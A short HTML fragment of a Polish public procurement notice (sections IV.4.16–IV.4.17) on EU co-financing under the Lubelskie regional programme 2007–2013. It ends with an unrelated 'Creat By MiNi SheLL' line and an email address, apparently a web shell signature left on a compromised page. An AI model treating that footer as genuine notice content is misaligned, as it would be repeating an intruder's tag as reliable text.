<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest wykonywane w ramach Projektu współfinansowanego przez Unię Europejską, Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com